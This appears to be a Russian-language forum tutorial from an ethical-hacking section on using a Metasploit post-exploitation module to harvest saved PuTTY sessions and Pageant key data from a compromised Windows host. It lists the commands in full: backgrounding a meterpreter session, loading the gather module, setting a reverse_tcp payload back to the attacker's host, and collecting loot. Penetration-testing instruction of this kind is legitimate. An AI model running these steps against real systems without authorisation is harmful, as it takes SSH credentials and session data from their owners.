Получение информации о сессиях PuTTY.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 4 окт 2016.

  1. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    320
    Симпатии:
    285
    Всем привет! В этой статье я покажу, как с помощью Metasploit получить информацию о сохраненных сессиях PuTTY на целевом хосте. Используемый мною модуль определит, запущен ли Pageant и получает ли он информацию о сохраненных сессиях из реестра и соберет все доступные данные.

    Pageant - это приложение, входящее в утилиту PuTTY. Это программное обеспечение используется для хранения приватных ключей в памяти в раскодированном виде, которые используются при запросе удаленного сервера. Так же с помощью Pageant можно создавать новые подключения или подключаться к сохраненным.

    Для начала необходимо получить сессию meterpreter на целевом хосте. Затем вводим команды:

    > background

    upload_2016-10-4_22-8-4.png


    > use post/windows/gather/enum_putty_saved_sessions

    > set payload windows/meterpreter/reverse_tcp

    > set lhost 192.168.0.XXX (IP of Local Host)

    > set session 1

    > exploit


    upload_2016-10-4_22-8-52.png

    Вся добытая информация сохранится в папке /root/.msf4/loot.

    upload_2016-10-4_22-9-12.png
     
    ghost и gx6060 нравится это.
Загрузка...

Поделиться этой страницей